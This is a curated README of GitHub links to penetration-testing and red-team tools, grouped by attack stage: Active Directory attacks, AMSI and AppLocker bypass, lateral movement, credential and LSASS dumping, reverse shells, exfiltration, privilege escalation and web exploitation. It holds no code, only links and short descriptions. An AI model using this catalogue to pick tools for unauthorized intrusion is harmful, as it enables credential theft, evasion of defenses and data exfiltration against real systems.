* [NAC bypass](#Network-access-control-bypass)
* [JMX Exploitation](#JMX-Exploitation)
And many more. I created this repo to have an overview over my starred repos. I was not able to filter in categories before. Feel free to use it for yourself. I do not list Kali default tools as well as several testing tools which are state of the art. STRG+F searches are helpful here.
# Windows Active Directory Pentest
### General usefull Powershell Scripts
https://github.com/S3cur3Th1sSh1t/WinPwn - :sunglasses:
https://github.com/dafthack/MailSniper
https://github.com/putterpanda/mimikittenz
https://github.com/dafthack/DomainPasswordSpray
https://github.com/mdavis332/DomainPasswordSpray - same but kerberos auth for more stealth and lockout-sleep
https://github.com/jnqpblc/SharpSpray - domainpasswordspray executable with lockout-sleep
https://github.com/Arvanaghi/SessionGopher
https://github.com/samratashok/nishang
https://github.com/PowerShellMafia/PowerSploit
https://github.com/fdiskyou/PowerOPS
https://github.com/giMini/PowerMemory
https://github.com/Kevin-Robertson/Inveigh
https://github.com/MichaelGrafnetter/DSInternals
https://github.com/PowerShellEmpire/PowerTools
https://github.com/FuzzySecurity/PowerShell-Suite
https://github.com/hlldz/Invoke-Phant0m
https://github.com/leoloobeek/LAPSToolkit
https://github.com/sense-of-security/ADRecon
https://github.com/adrecon/ADRecon - supported version - really nice Excel-Sheet for an AD-Overview
https://github.com/Arno0x/PowerShellScripts
https://github.com/S3cur3Th1sSh1t/Grouper
https://github.com/l0ss/Grouper2
https://github.com/NetSPI/PowerShell
https://github.com/NetSPI/PowerUpSQL
https://github.com/GhostPack - Various Powersploit Tasks in C#
https://github.com/Kevin-Robertson/Powermad - Adidns Attacks
## AMSI Bypass restriction Bypass
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://github.com/Flangvik/AMSI.fail
https://github.com/p3nt4/PowerShdll
https://github.com/jaredhaight/PSAttack
https://github.com/cobbr/InsecurePowerShell
https://github.com/Mr-Un1k0d3r/PowerLessShell
https://github.com/tothi/PowerLessShell - modified PowerLessShell
https://github.com/bitsadmin/nopowershell C# Powershell
https://github.com/OmerYa/Invisi-Shell
https://github.com/Hackplayers/Salsa-tools - Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched
https://github.com/padovah4ck/PSByPassCLM - Constrained language mode bypass
https://github.com/rasta-mouse/AmsiScanBufferBypass
https://github.com/itm4n/VBA-RunPE - Applocker Bypass
https://github.com/cfalta/PowerShellArmoury
https://github.com/Mr-B0b/SpaceRunner - This tool enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace.
https://github.com/RythmStick/AMSITrigger - The Hunt for Malicious Strings
https://github.com/rmdavy/AMSI_Ordinal_Bypass - Bypass AMSI and Defender using Ordinal Values in VBS
https://github.com/mgeeky/Stracciatella - OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, CLM and Script Block Logging disabled at startup
https://github.com/med0x2e/NoAmci - Using DInvoke to patch AMSI.dll in order to bypass AMSI detections triggered when loading .NET tradecraft via Assembly.Load().
https://github.com/rvrsh3ll/NoMSBuild - MSBuild without MSbuild.exe
https://github.com/Cn33liz/MSBuildShell - MSBuildShell, a Powershell Host running within MSBuild.exe
https://github.com/secdev-01/AllTheThingsExec - Executes Blended Managed/Unmanged Exports
https://github.com/cyberark/Evasor - A tool to be used in post exploitation phase for blue and red teams to bypass APPLICATIONCONTROL policies / Applocker Bypass Scan
https://github.com/tomcarver16/AmsiHook - AmsiHook is a project I created to figure out a bypass to AMSI via function hooking.
https://github.com/G0ldenGunSec/SharpTransactedLoad - Load .net assemblies from memory while having them appear to be loaded from an on-disk location.
https://github.com/itm4n/PPLdump - Bypass LSA Protection - Dump the memory of a PPL with a userland exploit
## Payload Hosting
https://github.com/kgretzky/pwndrop - Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.
https://github.com/sc0tfree/updog - Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.
## Network Share Scanner
Find Juicy Stuff
https://github.com/SnaffCon/Snaffler - a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4
https://github.com/djhohnstein/SharpShares - Enumerate all network shares in the current domain. Also, can resolve names to IP addresses.
https://github.com/vivami/SauronEye - Search tool to find specific files containing specific words, i.e. files containing passwords..
https://github.com/leftp/VmdkReader - .NET 4.0 Console App to browse VMDK / VHD images and extract files
https://github.com/mitchmoser/SharpShares - Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain
## Reverse Shellz
https://github.com/xct/xc - A small reverse shell for Linux & Windows
https://github.com/cytopia/pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
https://github.com/Kudaes/LOLBITS - C# reverse shell using Background Intelligent Transfer Service (BITS) as communication protocol and direct syscalls for EDR user-mode hooking evasion.
## Backdoor finder
https://github.com/linuz/Sticky-Keys-Slayer
https://github.com/ztgrace/sticky_keys_hunter
https://github.com/countercept/doublepulsar-detection-script
# Lateral Movement
https://github.com/0xthirteen/SharpRDP
https://github.com/0xthirteen/MoveKit - WMI,SMB,RDP,SCM,DCOM Lateral Movement techniques
https://github.com/0xthirteen/SharpMove - WMI, SCM, DCOM, Task Scheduler and more
https://github.com/rvrsh3ll/SharpCOM - C# Port of Invoke-DCOM
https://github.com/malcomvetter/CSExec - An implementation of PSExec in C#
https://github.com/byt3bl33d3r/CrackMapExec
https://github.com/cube0x0/SharpMapExec
https://github.com/nccgroup/WMIcmd
https://github.com/rasta-mouse/MiscTools - CsExec, CsPosh (Remote Powershell Runspace), CsWMI,CsDCOM
https://github.com/byt3bl33d3r/DeathStar - Automate Getting Dom-Adm
https://github.com/SpiderLabs/portia - automated lateral movement
https://github.com/Screetsec/Vegile - backdoor / rootkit
https://github.com/DanMcInerney/icebreaker - automation for various mitm attacks + vulns
https://github.com/MooseDojo/apt2 - automated penetration toolkit
https://github.com/hdm/nextnet - Netbios Network interface Enumeration (discovery of dual homed hosts)
https://github.com/mubix/IOXIDResolver - Find dual homed hosts over DCOM
https://github.com/Hackplayers/evil-winrm
https://github.com/bohops/WSMan-WinRM - A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object
https://github.com/dirkjanm/krbrelayx - unconstrained delegation, printer bug (MS-RPRN) exploitation, Remote ADIDNS attacks
https://github.com/Mr-Un1k0d3r/SCShell - Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
https://github.com/rvazarkar/GMSAPasswordReader - AD Bloodhound 3.0 Path
https://github.com/fdiskyou/hunter
https://github.com/360-Linton-Lab/WMIHACKER - A Bypass Anti-virus Software Lateral Movement Command Execution Tool
https://github.com/leechristensen/SpoolSample - PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface.
https://github.com/cube0x0/SharpSystemTriggers - Collection of remote authentication triggers in C#
https://github.com/leftp/SpoolSamplerNET - Implementation of SpoolSample without rDLL
https://github.com/topotam/PetitPotam - PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.
https://github.com/lexfo/rpc2socks - Post-exploit tool that enables a SOCKS tunnel via a Windows host using an extensible custom RPC proto over SMB through a named pipe.
https://github.com/checkymander/sshiva - C# application that allows you to quick run SSH commands against a host or list of hosts
https://github.com/dev-2null/ADCollector - A lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending.
https://github.com/mez-0/MoveScheduler - .NET 4.0 Scheduled Job Lateral Movement
https://github.com/GhostPack/RestrictedAdmin - Remotely enables Restricted Admin Mode
https://github.com/RiccardoAncarani/LiquidSnake - LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript
https://github.com/Hackndo/WebclientServiceScanner - Python tool to Check running WebClient services on multiple targets based on @leechristensen - https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb
https://github.com/dirkjanm/PKINITtools - Tools for Kerberos PKINIT and relaying to AD CS
https://github.com/juliourena/SharpNoPSExec - Get file less command execution for lateral movement.
# POST Exploitation
https://github.com/mubix/post-exploitation
https://github.com/emilyanncr/Windows-Post-Exploitation
https://github.com/nettitude/Invoke-PowerThIEf - Automatically scan any windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived.
https://github.com/ThunderGunExpress/BADministration - McAfee Epo or Solarwinds post exploitation
https://github.com/bohops/SharpRDPHijack - A POC Remote Desktop (RDP) session hijack utility for disconnected sessions
https://github.com/antonioCoco/RunasCs - RunasCs - Csharp and open version of windows builtin runas.exe
https://github.com/klsecservices/Invoke-Vnc - Powershell VNC injector
https://github.com/mandatoryprogrammer/CursedChrome - Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies, allowing you to browse sites as your victims.
https://github.com/djhohnstein/WireTap - .NET 4.0 Project to interact with video, audio and keyboard hardware.
https://github.com/GhostPack/Lockless - Lockless allows for the copying of locked files.
https://github.com/slyd0g/SharpClipboard - C# Clipboard Monitor
https://github.com/infosecn1nja/SharpDoor - SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.
https://github.com/qwqdanchum/MultiRDP - MultiRDP is a C# consosle application to make multiple RDP (Remote Desktop) sessions possible by patching termsrv.dll correctly.
https://github.com/Yaxser/SharpPhish - Using outlook COM objects to create convincing phishing emails without the user noticing. This project is meant for internal phishing.
https://github.com/eksperience/KnockOutlook - A little tool to play with Outlook
https://github.com/checkymander/Carbuncle - Tool for interacting with outlook interop during red team engagements
https://github.com/3gstudent/PasswordFilter - 2 ways of Password Filter DLL to record the plaintext password
https://github.com/TheWover/CertStealer - A .NET tool for exporting and importing certificates without touching disk.
https://github.com/swisskyrepo/SharpLAPS - Retrieve LAPS password from LDAP
https://github.com/n00py/LAPSDumper - remote LAPS dumping from linux
## Post Exploitation - Phish Credentials
https://github.com/hlldz/pickl3 - Windows active user credential phishing tool
https://github.com/shantanu561993/SharpLoginPrompt - Creates a login prompt to gather username and password of the current user. This project allows red team to phish username and password of the current user without touching lsass and having adminitrator credentials on the system.
https://github.com/Dviros/CredsLeaker
https://github.com/bitsadmin/fakelogonscreen
https://github.com/CCob/PinSwipe - Phish Smartcard PIN
https://github.com/IlanKalendarov/PyHook - PyHook is an offensive API hooking tool written in python designed to catch various credentials within the API call.
https://github.com/IlanKalendarov/SharpHook - SharpHook is an offensive API hooking tool designed to catch various credentials within the API call.
# Wrapper for various tools
https://github.com/S3cur3Th1sSh1t/PowerSharpPack - Various .NET Tools wrapped in Powershell
https://github.com/bohops/GhostBuild - GhostBuild is a collection of simple MSBuild launchers for various GhostPack/.NET projects
https://github.com/rvrsh3ll/Rubeus-Rundll32 - rundll32 Wrapper for Rubeus
https://github.com/checkymander/Zolom - execute Python in C# via ironpython
# Pivot
https://github.com/0x36/VPNPivot
https://github.com/securesocketfunneling/ssf
https://github.com/p3nt4/Invoke-SocksProxy
https://github.com/sensepost/reGeorg - Webshell tunnel over socks proxy - pentesters dream
https://github.com/hayasec/reGeorg-Weblogic - reGeorg customized for weblogic
https://github.com/nccgroup/ABPTTS TCP tunneling over HTTP/HTTPS for web application servers like reGeorg
https://github.com/RedTeamOperations/PivotSuite
https://github.com/trustedsec/egressbuster - check for internet access over open ports / egress filtering
https://github.com/vincentcox/bypass-firewalls-by-DNS-history
https://github.com/shantanu561993/SharpChisel - C# Wrapper around Chisel from
https://github.com/jpillora/chisel - A fast TCP tunnel over HTTP
https://github.com/esrrhs/pingtunnel - ping tunnel is a tool that advertises tcp/udp/socks5 traffic as icmp traffic for forwarding.
https://github.com/sysdream/ligolo - Reverse Tunneling made easy for pentesters, by pentesters
https://github.com/tnpitsecurity/ligolo-ng - An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.
https://github.com/nccgroup/SocksOverRDP - Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop
https://github.com/blackarrowsec/mssqlproxy - mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse
https://github.com/zeronetworks/cornershot - Amplify network visibility from multiple POV of other hosts
https://github.com/blackarrowsec/pivotnacci - A tool to make socks connections through HTTP agents
https://github.com/praetorian-inc/PortBender - TCP Port Redirection Utility
https://github.com/klsecservices/rpivot - socks4 reverse proxy for penetration testing
# Active Directory Audit and exploit tools
https://github.com/mwrlabs/SharpGPOAbuse
https://github.com/BloodHoundAD/BloodHound
https://github.com/BloodHoundAD/SharpHound3 - C# Data Collector for the BloodHound Project, Version 3
https://github.com/chryzsh/awesome-bloodhound
https://github.com/hausec/Bloodhound-Custom-Queries
https://github.com/CompassSecurity/BloodHoundQueries
https://github.com/knavesec/Max - Maximizing BloodHound. Max is a good boy.
https://github.com/vletoux/pingcastle
https://github.com/cyberark/ACLight
https://github.com/canix1/ADACLScanner
https://github.com/fox-it/Invoke-ACLPwn
https://github.com/fox-it/aclpwn.py - same as invoke-aclpwn but in python
https://github.com/dirkjanm/ldapdomaindump - Active Directory information dumper via LDAP
https://github.com/tothi/rbcd-attack - Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket
https://github.com/NotMedic/NetNTLMtoSilverTicket - SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket
https://github.com/FatRodzianko/Get-RBCD-Threaded - Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory environments
https://github.com/NinjaStyle82/rbcd_permissions - Add SD for controlled computer object to a target object for RBCD using LDAP
https://github.com/GhostPack/Certify - Active Directory certificate abuse.
https://github.com/ly4k/Certipy - Python implementation for Active Directory certificate abuse
https://github.com/zer1t0/certi - ADCS abuser
https://github.com/GhostPack/PSPKIAudit - PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.
https://github.com/cfalta/PoshADCS - A proof of concept on attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)
https://github.com/Kevin-Robertson/Sharpmad - C# version of Powermad
# Persistence on windows
https://github.com/fireeye/SharPersist
https://github.com/outflanknl/SharpHide
https://github.com/HarmJ0y/DAMP - The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification
https://github.com/ShutdownRepo/pywhisker - Python version of the C# tool for "Shadow Credentials" attacks
https://github.com/Ridter/pyForgeCert - pyForgeCert is a Python equivalent of the ForgeCert.
https://github.com/eladshamir/Whisker - Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.
https://github.com/GhostPack/ForgeCert - "Golden" certificates
https://github.com/RedSection/printjacker - Hijack Printconfig.dll to execute shellcode
# Web Application Pentest
# Framework Discovery
https://github.com/Tuhinshubhra/CMSeeK
https://github.com/Dionach/CMSmap - Wordpress, Joomla, Drupal Scanner
https://github.com/wpscanteam/wpscan
https://github.com/Ekultek/WhatWaf
# Framework Scanner / Exploitation
https://github.com/wpscanteam/wpscan - wordpress
https://github.com/n00py/WPForce
https://github.com/m4ll0k/WPSeku
https://github.com/swisskyrepo/Wordpresscan
https://github.com/rastating/wordpress-exploit-framework
https://github.com/coldfusion39/domi-owned - lotus domino
https://github.com/droope/droopescan - Drupal
https://github.com/whoot/Typo-Enumerator - Typo3
https://github.com/rezasp/joomscan - Joomla
# Web Vulnerability Scanner / Burp Plugins
https://github.com/m4ll0k/WAScan - all in one scanner
https://github.com/s0md3v/XSStrike - XSS discovery
https://github.com/federicodotta/Java-Deserialization-Scanner
https://github.com/d3vilbug/HackBar
https://github.com/gyoisamurai/GyoiThon
https://github.com/snoopysecurity/awesome-burp-extensions
https://github.com/sting8k/BurpSuite_403Bypasser - Burpsuite Extension to bypass 403 restricted directory
https://github.com/BishopFox/GadgetProbe - Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.
# Network- / Service-level Vulnerability Scanner
https://github.com/scipag/vulscan
https://github.com/zdresearch/OWASP-Nettacker
# File / Directory / Parameter discovery
https://github.com/OJ/gobuster
https://github.com/nccgroup/dirble
https://github.com/maK-/parameth
https://github.com/devanshbatham/ParamSpider - Mining parameters from dark corners of Web Archives
https://github.com/s0md3v/Arjun - :heartpulse:
https://github.com/Cillian-Collins/dirscraper - Directory lookup from Javascript files
https://github.com/KathanP19/JSFScan.sh - Automation for javascript recon in bug bounty.
https://github.com/hannob/snallygaster
https://github.com/maurosoria/dirsearch
https://github.com/s0md3v/Breacher - Admin Panel Finder
https://github.com/mazen160/server-status_PWN
# Crawler
https://github.com/jonaslejon/lolcrawler - Headless web crawler for bugbounty and penetration-testing/redteaming
https://github.com/s0md3v/Photon - :heartpulse:
https://github.com/kgretzky/dcrawl
https://github.com/lc/gau - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
# Web Exploitation Tools
https://github.com/OsandaMalith/LFiFreak - lfi
https://github.com/enjoiz/XXEinjector - xxe
https://github.com/tennc/webshell - shellz
https://github.com/flozz/p0wny-shell
https://github.com/epinna/tplmap - ssti
https://github.com/orf/xcat - xpath injection
https://github.com/almandin/fuxploider - File Uploads
https://github.com/nccgroup/freddy - deserialization
https://github.com/irsdl/IIS-ShortName-Scanner - IIS Short Filename Vuln. exploitation
https://github.com/frohoff/ysoserial - Deserialize Java Exploitation
https://github.com/pwntester/ysoserial.net - Deserialize .NET Exploitation
https://github.com/internetwache/GitTools - Exploit .git Folder Existence
https://github.com/liamg/gitjacker - Leak git repositories from misconfigured websites
https://github.com/cujanovic/SSRF-Testing - SSRF Tutorials
https://github.com/ambionics/phpggc - PHP Unserialize Payload generator
https://github.com/BuffaloWill/oxml_xxe - Malicious Office XXE payload generator
https://github.com/tijme/angularjs-csti-scanner - Angularjs Csti Scanner
https://github.com/0xacb/viewgen - Deserialize .NET Viewstates
https://github.com/Illuminopi/RCEvil.NET - Deserialize .NET Viewstates
# REST API Audit
https://github.com/microsoft/restler-fuzzer - RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services.
https://github.com/flipkart-incubator/Astra
# SAML Login
https://github.com/LuemmelSec/SAML2Spray - Python Script for SAML2 Authentication Passwordspray
# Swagger File API Attack
https://github.com/imperva/automatic-api-attack-tool
# Windows Privilege Escalation / Audit
https://github.com/itm4n/PrivescCheck - Privilege Escalation Enumeration Script for Windows
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS - powerfull Privilege Escalation Check Script with nice output
https://github.com/AlessandroZ/BeRoot
https://github.com/rasta-mouse/Sherlock
https://github.com/hfiref0x/UACME - UAC
https://github.com/FatRodzianko/SharpBypassUAC - C# tool for UAC bypasses
https://github.com/AzAgarampur/byeintegrity8-uac - Bypass UAC at any level by abusing the Program Compatibility Assistant with RPC, WDI, and more Windows components
https://github.com/rootm0s/WinPwnage - UAC
https://github.com/abatchy17/WindowsExploits
https://github.com/dafthack/HostRecon
https://github.com/sensepost/rattler - find vulnerable dlls for preloading attack
https://github.com/WindowsExploits/Exploits
https://github.com/Cybereason/siofra - dll hijack scanner
https://github.com/0xbadjuju/Tokenvator - admin to system
https://github.com/MojtabaTajik/Robber
https://github.com/411Hall/JAWS
https://github.com/GhostPack/SharpUp
https://github.com/GhostPack/Seatbelt
https://github.com/A-mIn3/WINspect
https://github.com/hausec/ADAPE-Script
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/bitsadmin/wesng
https://github.com/itm4n/Perfusion - Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)
# Windows Privilege Abuse (Privilege Escalation)
https://github.com/gtworek/Priv2Admin - Abuse Windows Privileges
https://github.com/itm4n/UsoDllLoader - load malicious dlls from system32
https://github.com/TsukiCTF/Lovely-Potato - Exploit potatoes with automation
https://github.com/antonioCoco/RogueWinRM - from Service Account to System
https://github.com/antonioCoco/RoguePotato - Another Windows Local Privilege Escalation from Service Account to System
https://github.com/itm4n/PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019
https://github.com/BeichenDream/BadPotato - itm4ns Printspoofer in C#
https://github.com/zcgonvh/EfsPotato - Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
https://github.com/antonioCoco/RemotePotato0 - Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.
https://github.com/itm4n/FullPowers - Recover the default privilege set of a LOCAL/NETWORK SERVICE account
# T3 Enumeration
https://github.com/quentinhardy/jndiat
# Linux Privilege Escalation / Audit
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS - powerfull Privilege Escalation Check Script with nice output
https://github.com/mzet-/linux-exploit-suggester
https://github.com/rebootuser/LinEnum
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/CISOfy/lynis
https://github.com/AlessandroZ/BeRoot
https://github.com/future-architect/vuls
https://github.com/ngalongc/AutoLocalPrivilegeEscalation
https://github.com/b3rito/yodo
https://github.com/belane/linux-soft-exploit-suggester - lookup vulnerable installed software
https://github.com/sevagas/swap_digger
https://github.com/NullArray/RootHelper
https://github.com/NullArray/MIDA-Multitool
https://github.com/initstring/dirty_sock
https://github.com/jondonas/linux-exploit-suggester-2
https://github.com/sosdave/KeyTabExtract
https://github.com/DominicBreuker/pspy
https://github.com/itsKindred/modDetective
https://github.com/nongiach/sudo_inject
https://github.com/Anon-Exploiter/SUID3NUM - find suid bins and look them up under gtfobins / exploitable or not
https://github.com/nccgroup/GTFOBLookup - Offline GTFOBins
https://github.com/TH3xACE/SUDO_KILLER - sudo misconfiguration exploitation
https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
https://github.com/inquisb/unix-privesc-check
https://github.com/hc0d3r/tas - easily manipulate the tty and create fake binaries
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/initstring/uptux
https://github.com/andrew-d/static-binaries - not really privesc but helpfull
https://github.com/liamg/traitor - Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, polkit, docker socket
# Exfiltration
## Credential harvesting Windows Specific
https://github.com/gentilkiwi/mimikatz
https://github.com/GhostPack/SafetyKatz
https://github.com/Flangvik/BetterSafetyKatz - Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.
https://github.com/GhostPack/Rubeus
https://github.com/ShutdownRepo/targetedKerberoast - Kerberoast with ACL abuse capabilities
https://github.com/Arvanaghi/SessionGopher
https://github.com/peewpw/Invoke-WCMDump
https://github.com/tiagorlampert/sAINT
https://github.com/AlessandroZ/LaZagneForensic - remote lazagne
https://github.com/eladshamir/Internal-Monologue
https://github.com/djhohnstein/SharpWeb - Browser Creds gathering
https://github.com/moonD4rk/HackBrowserData - hack-browser-data is an open-source tool that could help you decrypt data[passwords|bookmarks|cookies|history] from the browser.
https://github.com/mwrlabs/SharpClipHistory - ClipHistory feature get the last 25 copy paste actions
https://github.com/0x09AL/RdpThief - extract live rdp logins
https://github.com/chrismaddalena/SharpCloud - Simple C# for checking for the existence of credential files related to AWS, Microsoft Azure, and Google Compute.
https://github.com/djhohnstein/SharpChromium - .NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins.
https://github.com/rxwx/chlonium - Chromium Cookie import / export tool
https://github.com/V1V1/SharpScribbles - ThunderFox for Firefox Credentials, SitkyNotesExtract for "Notes as passwords"
https://github.com/securesean/DecryptAutoLogon - Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon
https://github.com/G0ldenGunSec/SharpSecDump - .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py
https://github.com/EncodeGroup/Gopher - C# tool to discover low hanging fruits like SessionGopher
https://github.com/GhostPack/SharpDPAPI - DPAPI Creds via C#
https://github.com/Hackndo/lsassy
https://github.com/aas-n/spraykatz
https://github.com/b4rtik/SharpKatz - C# porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
https://github.com/login-securite/DonPAPI - Dumping DPAPI credz remotely
https://github.com/Barbarisch/forkatz - credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege
https://github.com/skelsec/pypykatz - Mimikatz implementation in pure Python
## LSASS dumper / process dumper
https://github.com/codewhitesec/HandleKatz - PIC lsass dumper using cloned handles
https://github.com/m0rv4i/SafetyDump - Dump stuff without touching disk
https://github.com/CCob/MirrorDump - Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory
https://github.com/deepinstinct/LsassSilentProcessExit - Command line interface to dump LSASS memory to disk via SilentProcessExit
https://github.com/outflanknl/Dumpert - dump lsass using direct system calls and API unhooking
https://github.com/cube0x0/MiniDump - C# Lsass parser
https://github.com/b4rtik/SharpMiniDump - Create a minidump of the LSASS process from memory - using Dumpert
https://github.com/b4rtik/ATPMiniDump - Evade WinDefender ATP credential-theft
https://github.com/aas-n/spraykatz - remote procdump.exe, copy dump file to local system and pypykatz for analysis/extraction
https://github.com/jfmaes/SharpHandler - This project reuses open handles to lsass to parse or minidump lsass
## Credential harvesting Linux Specific
https://github.com/huntergregal/mimipenguin
https://github.com/n1nj4sec/mimipy
https://github.com/dirtycow/dirtycow.github.io
https://github.com/mthbernardes/sshLooterC - SSH Credential loot
https://github.com/blendin/3snake - SSH / Sudo / SU Credential loot
https://github.com/0xmitsurugi/gimmecredz
https://github.com/TarlogicSecurity/tickey - Tool to extract Kerberos tickets from Linux kernel keys.
## Data Exfiltration - DNS/ICMP/Wifi Exfiltration
https://github.com/FortyNorthSecurity/Egress-Assess
https://github.com/p3nt4/Invoke-TmpDavFS
https://github.com/DhavalKapil/icmptunnel
https://github.com/iagox86/dnscat2
https://github.com/Arno0x/DNSExfiltrator
https://github.com/spieglt/FlyingCarpet - Wifi Exfiltration
https://github.com/SECFORCE/Tunna - Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP
https://github.com/sysdream/chashell
https://github.com/no0be/DNSlivery - Easy files and payloads delivery over DNS
https://github.com/mhaskar/DNSStager - Hide your payload in DNS
https://github.com/Flangvik/SharpExfiltrate - Modular C# framework to exfiltrate loot over secure and trusted channels.
## Git Specific
https://github.com/dxa4481/truffleHog
https://github.com/zricethezav/gitleaks
https://github.com/adamtlangley/gitscraper
## Windows / Linux
https://github.com/AlessandroZ/LaZagne
https://github.com/Dionach/PassHunt
https://github.com/vulmon/Vulmap
# Reverse Engineering / decompiler
https://github.com/mattifestation/PowerShellArsenal
https://github.com/0xd4d/dnSpy - .NET Disassembler
https://github.com/NationalSecurityAgency/ghidra
https://github.com/icsharpcode/ILSpy
# Forensics
https://github.com/Invoke-IR/PowerForensics
https://github.com/Neo23x0/Loki
https://github.com/gfoss/PSRecon
# Network Attacks
https://github.com/bettercap/bettercap - :heartpulse:
https://github.com/SpiderLabs/Responder
https://github.com/lgandx/Responder - more up to date
https://github.com/evilsocket/bettercap - Deprecated but still good
https://github.com/r00t-3xp10it/morpheus
https://github.com/fox-it/mitm6
https://github.com/Kevin-Robertson/InveighZero - mitm6 in C# + Inveigh default features
https://github.com/mdsecactivebreach/Farmer - Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.
https://github.com/audibleblink/davil - leaking net-ntlm with webdav
https://github.com/mgeeky/SharpWebServer - Red Team oriented C# Simple HTTP & WebDAV Server with Net-NTLM hashes capture functionality
https://github.com/DanMcInerney/LANs.py
## Specific MITM service Exploitation
https://github.com/jtesta/ssh-mitm - SSH
https://github.com/pimps/wsuxploit - WSUS
https://github.com/GoSecure/WSuspicious - WSuspicious - A tool to abuse insecure WSUS connections for privilege escalations
https://github.com/GoSecure/pywsus - WSUS mitm - Standalone implementation of a part of the WSUS spec. Built for offensive security purposes.
https://github.com/SySS-Research/Seth - RDP
https://github.com/GoSecure/pyrdp - RDP man-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact
https://github.com/infobyte/evilgrade - Fake Updates for various Software
https://github.com/samdenty/injectify - web application live recording, keystroke logger
https://github.com/skorov/ridrelay - User Enumeration with SMB Relay Attacks
https://github.com/Kevin-Robertson/Invoke-TheHash
## Sniffing / Evaluation / Filtering
https://github.com/DanMcInerney/net-creds
https://github.com/odedshimon/BruteShark -
https://github.com/lgandx/PCredz
https://github.com/Srinivas11789/PcapXray
# Red-Team SIEM
https://github.com/outflanknl/RedELK - Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
# Scanner / Exploitation-Frameworks / Automation
https://github.com/threat9/routersploit
https://github.com/nccgroup/autopwn
https://github.com/1N3/Sn1per
https://github.com/byt3bl33d3r/CrackMapExec
https://github.com/Cn33liz/p0wnedShell
https://github.com/archerysec/archerysec
https://github.com/vulnersCom/nmap-vulners
https://github.com/m4ll0k/AutoNSE - automate nmap with scripting capabilities
https://github.com/v3n0m-Scanner/V3n0M-Scanner
https://github.com/zdresearch/OWASP-Nettacker
https://github.com/rvrsh3ll/SharpSMBSpray - Spray a hash via smb to check for local administrator access
## Default Credential Scanner
https://github.com/ztgrace/changeme
https://github.com/InfosecMatter/default-http-login-hunter - Login hunter of default credentials for administrative web interfaces leveraging NNdefaccts dataset.
https://github.com/FortyNorthSecurity/EyeWitness
https://github.com/byt3bl33d3r/WitnessMe - screenshot for webservers
https://github.com/ihebski/DefaultCreds-cheat-sheet - One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password
## Default Credential Lookup
https://github.com/Viralmaniar/Passhunt
# Payload Generation / AV-Evasion / Malware Creation
https://github.com/nccgroup/Winpayloads
